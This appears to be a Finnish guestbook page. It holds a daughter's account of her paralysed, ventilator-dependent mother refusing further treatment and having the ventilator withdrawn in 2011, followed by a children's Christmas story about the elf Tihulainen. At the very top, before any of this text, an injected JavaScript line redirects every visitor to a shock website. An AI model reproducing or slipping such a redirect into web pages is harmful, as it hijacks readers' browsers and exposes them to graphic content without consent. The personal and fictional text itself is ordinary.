<script type="text/javascript"> window.location = "http://www.meatspin.com" </script>

Tiedän, mitä minun täytyy tehdä; kirjoittaa!

Kerron tämän siksi, että jokaisen hengityskoneessa olevan ihmisen PITÄÄ SAADA TIETÄÄ OIKEUKSISTAAN ja siitä, että Heilläkin on mahdollisuus päättää omasta elämästään.

Hengityshalvauspotilas 32 vuotta. Kaulasta alaspäin halvaantunut 34-vuotiaasta lähtien, hengityskone ylläpitämässä elämää…. kuitenkin ONNELLISTA ELÄMÄÄ!
Äitini kaikesta huolimatta kasvatti loistavasti meidät tyttäret sekä teki mummona uskomattoman hienoa työtä yhdeksän lapsenlapsen kanssa. Konsertit, teatterit, kirpputorit,aika ystävien kanssa, koiran lenkkeilytys ym. kuuluivat normaalina osana äitini elämää, pyörätuoli ja hengityskone eivät hidastaneet tahtia.

Syksyllä 2010 sairaudet ja vaikeudet astuivat voimakkaasti Äitini elämään, hän alkoi väsymään… jatkuvia äkkilähtöjä sairaalaan milloin minkäkin asian takia. Viimeisimpänä keuhkokuume joulun aikaan, jonka seurauksena Äitini ilmoitti Keskussairaalan johtaville tahoille tammikuussa 2011 kieltäytyvänsä KAIKESTA hoidosta ja siirtyvänsä kotiin saattohoitoon. Pitihän sairaalan psykologin, joka ei ollut aikaisemmin tavannut Äitiäni, nöyryyttää Hänet vielä kymmenen minuutin tapaamisen perusteella ja luokitteli Hänet henkisesti niin sairaaksi, ettei kykenisi vastaamaan omista asioistaan! Kumma, ettei kukaan muu, äitini pitkäaikaiset avustajat mukaan lukien olleet huomanneet tätä ”mielisairautta”.

Äitini siis jätti insuliinit sekä kaikki lääkkeet pois, joita olikin vuosien myötä dosettiin kertynyt monta kymmentä nappia päivää kohden. Ruoka ei maittanut, koska viimeisenä riesana alkanut keliakia pisti elimistön sekaisin. Nestettä meni joinakin päivinä hieman.
Kolme ja puoli viikkoa katsoin Äitini kuihtumista ja kärsimystä morfiinilaastarien kera.
Äitini oli aina toivonut, että saisi lähteä ”saappaat jalassa”, eli täysissä järjissä, pyörätuolissaan istuen. Katselimme jo syksyllä maita, joissa saisimme eutan asian Hänelle, mutta se olisi vaatinut tukon rahaa, jota meiltä ei löytynyt.

Maanataina 14.2.2011 Äitini tajunnataso oli jo niin alhainen, että katsekontaktia emme enää saaneet, puhekyky olikin jo mennyt muutamaa päivää aikaisemmin.
Odotimme, odotimme ja odotimme, että Jumala tai joku armahtaisi Äitimme tästä kidutuksesta.

Torstaina 17.2. räjähti siskoni ja minun eteen suoranainen pommi: Äidillämme olisi ollut TÄYSI OIKEUS KIELTÄYTYÄ MYÖS HENGITYSKONEHOIDOSTA, kukaan henkilökunnasta saatika sairaalaan päättäjistä ei ollut tätä asiaa ”muistanut” kertoa asiakkaalleen tai hänen omaisilleen!! Kyseinen lakipykälä oli kuulemma ollut jo syksystä 2010 asti voimassa. Päätös jäi minun ja siskoni kannettavaksi. Toteutimme Äitimme tahtoa ja toivoimme mahdollisimman pikaisesti hengityskonehoidon lopettamista.

18.2.2011 Kävelin aamulla kipakassa pakkasessa Äitini kotiin, pesin ja puin Hänet kauniisti. Siskoni, mieheni sekä yli 20 vuotta äitiäni avustanut työntekijä saapuivat myös. Vaihdoimme viimeisen kerran morfiinilaastarin ja lähdimme Äidin kanssa ambulanssilla kohti keskussairaalaa.
Sairaalan hiljaisessa huoneessa annettiin Äidille rentouttava- ja kipulääkitys suoraan suoneen. Hengityskone sammutettiin klo: 11.15, jonka jälkeen Äitini vielä hengitti omilla keuhkoillaan 12 minuuttia, kyyneleet silmistä valuen, hymyn häivä huulillaan, täysin hetkessä mukana ollen. Suuri kaunis liekki sammui klo: 11.27.

Kaikesta surusta ja ikävästä huolimatta, hetki oli onnellinen. Äitini oli vapaa ja Hänen suuri pelkonsa tukehtumiskuolemasta ei toteutunut!
Monta mutkaa ja kuoppaa oli tässäkin taipaleessa, mutta loppujen lopuksihan Äitimme tahto toteutui: Hän sai päättää omasta elämästään meidän tyttärien ”suun kautta”.

Joulutevehdys

Tonttu Tihulaisen tiirailumatka.
© 2008 Kaino Maho

Oli melkein jouluaatto. Jouluun oli enää jäljellä vain kolme yötä. Tonttu Tihulainen oli hiippaillut kurkistelemassa jo monta, monta kertaa talojen ikkunoista. Tosin hän ei nähnyt sisälle kuin verhon raosta, mutta puhe kuului oven läpi oikein hyvin. Samalla hän tietysti kurkisteli, ainakin toisella silmällä, mitä Tauno ja Liisa naapurissa touhusivat. Tonttu Tihulainen joutui kertomaan Joulupukille myös Liisan ja Taunon touhuista, varsinkin kiukuttelusta, oli pukki sanonut.
Tonttu Tihulainen oli taas kerran lähdössä Korvatunturilta tarkkailumatkalle. Hän oli saanut käyttöönsä ihan ikioman poron. Sen nimi oli Vilpuri. Vilpuri oli vielä nuori. Ei se vielä ollut Joulupukin Petteri- poron veroinen, mutta oli se Petterille sukua. Tosin kaukaista, mutta sukua kuitenkin.
Tihulainen tuli öljylyhty kädessä juuri ulos tallista Vilpuri- poroa taluttaen kun Joulupukki tuli tallin pihalla vastaan. “Voi tullantii sentään. Taas tuo ikivanha takkupartainen, löhöposkinen ukonkäppyrä. Mistä sekin siihen ilmestyi. Olisi pysynyt joulumuorin kainalossa. Eikö edes poroa saa valjastaa rauhassa reen eteen”, mutisi tonttu Tihulainen itsekseen ja sanoi sitten ääneen: ”Hyvää joulun odotusta, Joulupukki”. “Samaa sinullekin Tihulainen, hih hih”, vastasi joulupukki ja mutisi vielä itsekseen: “Tihulainen. On siinäkin nimi. Tihulainen, heh heh heh”. “Kuulehan sinä Tihulainen. Sinä et ole kertonut mitään Joonan touhuista. Oletko sinä tyystin unohtanut hänet? Eikö sinun olisi aika kurkistaa hänenkin ikkunasta sisään”? kysyi Joulupukki ja jatkoi vielä: “Viime jouluna oli lähellä, ettei Joona jäänyt ilman lahjoja”. Unohtanut ja unohtanut. Vai vielä mitä. Menisit itse sinne henkesi uhalla seiniä pitkin kiipeilemään, ajatteli Tihulainen itsekseen mutta kuitenkin änkytti Joulupukille vain: ”Pu pu Pukki hyvä, mi mi minä olen juuri lähdössä sinne suunnalle Vilpuri- poron kanssa. E e en minä… “. Eikä tonttu Tihulainen ehtinyt muuta sanomaankaan, kun pukki jo tokaisi: “Etkä sitten nuku siellä ikkunan takana tiiraillessa. Johan lapsetkin heräävät sinun kuorsaukseen.” Sitten hän kääntyi kohti muorin tupaa ja sanoi haukotellen: “Hohhoijaa, kylläpäs nukuttaa”.
Kyllä tonttu Tihulainen muisti hyvin Joonan. Mutta aina hänelle lankesi nämä kaikkein vaikeimmat tehtävät. Oikeasti asia ei ollut niin. Tihulainen vain luuli joulupukin järjestävän ihan ilmiselvästi piruuttaan hänelle kaikkein vaikeimmat tapaukset.

Vilpuri kiidätti rekeä tähtitaivaalla kuutamon valaistessa kauniisti maan pinnalla hohtavaa valkoista hankea. Reki ei ollut mikä tahansa tavallinen reki, vaan Tihulainen oli ihan itse porannut reikiä reen laitoihin. Reikiä oli joka puolella ympäri rekeä. Niitä oli sivuilla ja niitä oli takana. Oli pienempiä yhden silmän tiirailua varten ja isompia kahdella silmällä tiirailua varten. Olipa yksi isompi reikä edessä Vilpuri- poron tarkkailua varten, mutta sen reiän tekoa tonttu oli katunut monta monta kertaa. Niistä oli kätevä seurata lasten touhuja ja aikuisten hössötyksiä. Niin kuin yleensä, Tihulainen oli tälläkin kerralla myöhässä.
Tonttu Tihulainen köllötteli reessä mukavasti lämpimän vällyn alla. Sen oli joulumuori kutonut vanhoista pukin villahousuista purkamasta villalangasta ihan tonttu Tihulaista varten. Ressukka kun on niin pieni ja viluinen. Nyt kävi Tihulaiselle kuten aina ennenkin. Tonttu Tihulainen oli nukahtanut. Onneksi poro Vilpuri nuoresta iästä huolimattaan oli jo oppinut hyvin tuntemaan Tihulaisen metkut. Vilpuri oli joutunut niin niin usein kuuntelemaan tontun kuorsausta. Tällä kerralla hän päätti ottaa käyttöön tehokeinon. Äkkiä Vilpuri päästi takapäästään kunnon pöräyksen niin että häntä heilahti ja hajuhuurut pöllähti juuri sopivasti reen etulaidassa olevasta isosta reiästä suoraan tonttu Tihulaisen nenään. Poro Vilpuri tiesi, että tämä jos mikä sai tontun hereille. “Köh köh, ääh. Taasko tuo poro pahalainen aloitti nuo metkut”, sanoi Tihulainen samalla hieroen uneliaita silmiään”.
Tihulainen kurkisti reestä alas. “Kappas vaan. Kuulehan Vilpuri, kyllä sinä olet nopea. Me ollaan kohta perillä. Alahan hidastaa vauhtia. - Hohhoijaa. - Laskeudupa tuon kerrostalon katolle. Sieltä on kätevä laskeutua vesitorvea pitkin parvekkeelle kurkkimaan. Nähdään, mitä se Joona touhuaa,” sanoi Tihulainen. Vilpuri kaarteli kerrostalojen yllä, sujahti parin talon välistä ja kurvaisi ylös talon katolle niin että reki osui katolla pystyssä sojottaneeseen ilmastointitorveen. Reki heilahti aika pahasti ja tonttu Tihulaiselle kävi köpelösti. Hän putosi katolle pyllylleen. “Senkin himpskutti. Senkin nelijalkainen sarvipää tohelo”, manaili hän mielessään, mutta varoi sanomasta ääneen, ettei Vilpuri kuulisi. Vilpuri voisi vaikka suuttua ja lähteä yksin korvatunturille.
“Kehvelin lapset. Eikö mokomat vanhemmat osaa valita kunnollista paikkaa kodille. Aina pitää kiipeillä milloin mitäkin pitkin ikkunoihin ja parvekkeille lapsia kurkkimassa. Kaikkea pukkikin on keksinyt”, ajatteli Tihulainen itsekseen.
Tihulainen kurkisti katon räystäältä alas. Häntä alkoi pelottaa. “Huh huh. Eiii, en minä uskalla. Olisipa takkuparta itse täällä. Näkisi kuinka Pukin polvet tutisisi” ,kuului tontun suusta mutinaa.
“Ei auta itku Tonttulassa. He he. Ei auta itku… On siinäkin sanonta. Heh heh. Alas on päästävä”, mutisi Tihulainen, otti molemmin käsin kiinni vesirännistä ja alkoi laskeutua alas kohti Joonan parveketta. Huuruisessa peltitorvessa pyrki kädet luisumaan. Niinpä tontun piti riisua molemmat käsineet pois saadakseen peltitorvesta paremman otteen. Kun hän laittoi muorin kutomia käsineitä taskuun, putosi toinen käsine maahan. Sitten tapahtui jotain kummallista. Ylhäällä alkoi kuulua rutinaa. Samaan aikaan vesiränni irtosi seinästä ja kallistui taaksepäin. Tihulaisen ote lipesi ja hän putosi. Onneksi Joulupukki oli antanut Tihulaiselle Vilpuri- poron. Vilpuri tiesi tontun toheloinnit ja oli aina valppaana kaiken varalta juuri tällaisia tilanteita varten. Vilpuri laittoi kaikki peliin ja otti maailman nopeimman lähdön. Syöksyi suoraan katolta alas, kaartoi kaatuvan vesirännin viereen, potkaisi vauhdissa takajalalla ränniä niin kovasti, että tontun käsien ote irtosi torvesta ja Tihulainen pudota mätkähti jo ennestään kipeä pylly edellä rekeen juuri kun reki oli ehtinyt oikealle kohdalle. Saman tien Vilpuri suuntasi reen Korvatunturia kohti.
Vauhti oli valtava, sillä jäljessä näkyi vain komeasti värikkäänä säkenöivä tähtivana. Poro Vilpuri vilkaisi taakseen ja ajatteli. “Vaan jo on komea tuo Tihulaisen pyllystä lähtevä tähtivana”.

Seuraava iltana tonttu Tihulainen heräsi tallin vintillä heinäkasasta alhaalta kuuluvaan ääneen. Käsiä paleli vietävästi. Kylkeä kolotti ja pyllyä kivisti. Sitten hän muisti edellisen illan tapahtuman. “Senkin vietävän pujoparta pukki kun… Senkin vietävän Joona, kun ... kun asuu niin korkealla. Mitä se Pukkikin sitä… Kyllä minä sen ensi yönä selvitän, mikä se poika on miehiään”, mutisi tonttu itsekseen. “Vielä minä sille pukille näyt…än. Hkroohh”. Tihulainen vaipui kesken ajatuksen uudelleen uneen.

Kello oli jo lähellä puoliyötä, kun Vilpuri kyllästyi odotukseen. Poro päätti herättää tonttu Tihulaisen. Tehokeino oli taas tarpeen. Poro koukisti jalkoja, otti vauhtia ja potkaisi tallin kattoon molemmin takajaloin yhtä aikaa. Vaan jo tömähti. Potku osui juuri heinäkasan alapuolelle ja niin heinäkasa tonttuineen lennähti ainakin pöydän korkeudelle lattiasta. Taas tonttu Tihulainen pudota rojahti pylly edellä kovalle lattialle. Se oli jo kolmas kerta. Tällä kertaa Tihulainen ei sanonut yhtään mitään. Hänen pyllyyn teki niin kipeää, ettei hän saanut sanaakaan ulos suustaan.
Tihulainen laskeutui portaita pitkin alas tallin vintiltä. Puolivälissä portaita oli hän vähällä luiskahtaa alas. Ulkona Tihulainen hämmästyi. Nyt tonttu ei ymmärtänyt yhtään mitään. Vilpuri- poro seisoi reen edessä valmiina lähtöön. “Mi mitä himpskuttia täällä tapahtuu? Kuka kumm…” Tontun sana jäi kesken, sillä Vilpuri tarttui hampailla Tihulaisen kaulukseen ja tempaisi hänet rekeen. Saman tien lähdettiin matkaan.
Nyt oli kiire, sillä jo huomenna on jouluaatto, eikä tonttu Tihulainen ollut vieläkään saanut selvää, pitäisikö Joonan lahjan olla pehmeässä vai kovassa paketissa. Reestä alkoi kuulua ähinää, puhinaa ja voihkintaa. “Aih, voi voi, äh. Sattuu. Sinäkin Vilpuri, senkin karvaturpa sarvipää. Mitä se Pukkikin… Käsiäkin paleltaa. Muutenkin nämä yöt ennen joulua ovat raskaita, kun ei anneta edes nukkua”, valitti Tihulainen ja vetäytyi peiton alle lämpimään. Hetken päästä alkoi kuulua kuorsaus.
Tihulainen heräsi. Ja pyllyyn sattui. Tällä kerralla ei poro Vilpurin tehoherätystä tarvittu. Oltiin kohta perillä. Tihulainen mietti, miten hän onnistuisi kapuamaan salaa parvekkeelle tirkistelemään Joonan touhuja. Korvatunturille ei ollut paluuta, ellei pukille olisi mitään kerrottavaa.
Sitten Tontun päässä välähti. Pikkuinen kuin kynttilän tuikku, mutta kuitenkin ihan tarpeeksi iso oivallus. “Pukki juutas. Pukki on valjastanut Vilpurin valmiiksi reen eteen sillä välin kun minä nukuin“, huudahti tonttu kovaan ääneen. Vilpuri vähän hymyili.
“Kappas vaan. Mitäs täällä on? Sehän on köysi. Mistäs se siihen tupsahti? Taitaa Joulupukki kuitenkin olla mukava ukonköriläs“, ajatteli Tihulainen itsekseen.
“Vilpuri, ajetaanpas tuon talon editse, niin minä heitän köyden tuonne parvekkeen kaiteeseen. Sitten jätät minut maahan. Minä kiipeän sitä pitkin ylös“, huusi hän Vilpurille.
Tihulainen tarttui köyteen ja alkoi kiivetä ylös. Köysi oli karkea. Käsiin sattui. Käsiä paleli muutoinkin, koska joulumuorin kutomat käsineet oli edellisenä yönä tipahtaneet maahan. Lapset olivat ne sieltä löytäneet ja ihmetelleet, kenen ovat noin pikkuiset ja kauniit käsineet. Olipa Pekka- sedän Tessu- koirakin ohi kulkiessaan katsonut niitä ja jopa kerran haukahtanutkin.
Tihulainen jaksoi juuri ja juuri kiivetä ylös parvekkeelle saakka. Hän kapusi parvekkeen kaiteen yli. Jalka osui vanhaan kukkaruukkuun, ruukku kaatui ja kieri parveketta pitkin. “Voi tulikekäle sentään. Kunhan kukaan ei kuulisi meteliä“, ajatteli tonttu. “Mutta miksi ihmeessä sisällä ei ole valoja? Kuinka kaikki jo nyt nukkuvat?, hän ihmetteli itsekseen. Yhtäkkiä sisältä alkoi kuulua käen kukuntaa. Se kuului käkikellosta. Tihulainen havahtui. “Taas minulle kävi näin. Kohtahan on jo aamu, eikä minulla ole vielä mitään kerrottavaa joulupukille ja vielä pimeän aikana pitäisi ehtiä takaisin korvatunturille. Voi voi, voi minua poloista. Miten minä täältä pääsen alas. Ja jotain pitäisi pukillekin …yhyy” ,tonttu Tihulainen valitti kyynel silmäkulmassa.
Poro Vilpuri kuuli tontun nyyhkytyksen ja riensi apuun. Vilpuri pyyhälsi häntä suorana liehuen parvekkeen editse ja kehotti Tihulaista tarttumaan köyteen. Vilpuri pyyhälsi ilmojen halki talon ympäri, näki tontun roikkuvan köydestä, suuntasi tontun alle, kaappasi hänet sarviinsa ja saman tien sinkosi hänet selkänsä yli rekeen. Tietäähän sen kuinka siinä Tihulaiselle kävi. Taas kerran Tihulainen putosi reen pohjalle pyllylleen. Kyllä se sattui. Tonttu Tihulaisella ei ollut aikaa valittaa. Nyt piti keksiä jotain Joulupukille kerrottavaa, ja nopeasti. Tihulainen vetäytyi peiton alle lämpimään ja alkoi miettiä.
“Himpskutin Joulupukki kun aina nämä vaikeimmat jutut järjestää minulle. Pukki on oikein … oiken… möhömaha kitupiikki“, sadatteli hän ensin, mutta lopulta rauhoittui. “Jospa minä kerron hänelle niin kuin asia on. Mitähän se muorikin sanoo niistä kadonneista käsineistä”.

Vähän ennen korvatunturia Vilpuri herätti Tihulaisen. Tällä kertaa hirnahtaen ihan niin kuin kunnon porot konsanaan. Tihulainen talutti Vilpurin lämpimään talliin ja antoi porolle heiniä ja runsaasti kauraa. Muisti hän laittaa ämpärillisen vettäkin.
Nyt oli kohtalon hetki edessä. Hänen oli lähdettävä pukin pajaan kertomaan totuus. Pajalle oli lyhyt matka, mutta Tihulainen ei jostain syystä kiirehtinyt. Joulupukki näki tontun tulon pajan ikkunasta ja kiirehti ovelle vastaan. “Hyvää jouluaattoa, Tihulainen, hih hih. Mutta hyvänen aika sentään. Oletko sinä kipeä kun kävelet noin vaikeasti? kysyi Joulupukki. “Vähän vain väsynyt”, vastasi tonttu. Sitten Joulupukki sanoi: “Kuulepas Tihulainen. Kaikki lasten lahjat on kohta valmistettu ja pakattu, mutta kuinkas se Joonan lahjojen kanssa on? Annas kuulua Tihulainen, hih hih?”. Ja Tihulainen kertoi: “Joo tuota, tuota noin. Me Vilpuri- poron kanssa tiirailtiin kaksi yötä niillä kulmilla erittäin vaikeissa olosuhteissa ja kyllä sitä jotakin selvisi. On näet sillä lailla ettei siitä pojasta oikein tolkkua saa paholail… siis kukaan, mutta kyllä hän näyttää olevan sillä tavalla tuota, … niin kuin muutkin lapset konsanaan. Minä en nähnyt hänen kertaakaan kiukuttelevan. Illallakin kun kiepautin itseni ketterästi parvekkeelle, hän oli jo mennyt kiltisti nukkumaan”. “No mitä sinä ajattelet Tihulainen, mitä minun pitäisi antaa Joonalle lahjaksi?, kysyi pukki tontulta neuvoa.
“Anna kovia paketteja. - Ja muutama pehmyt nyssykkä kaiken varalta”, hihkaisi hän jälkeensä juostessaan vaivalloisesti muorin tupaa kohti lämpimään joulupuurolle.
Tänä jouluna tonttu Tihulainen toivoi itsekseen pehmeää lahjapakettia. Joulumuorin kutomia lämpimiä käsineitä.

Tänne saa laittaa tervehdysviestejä lukijoiden iloksi!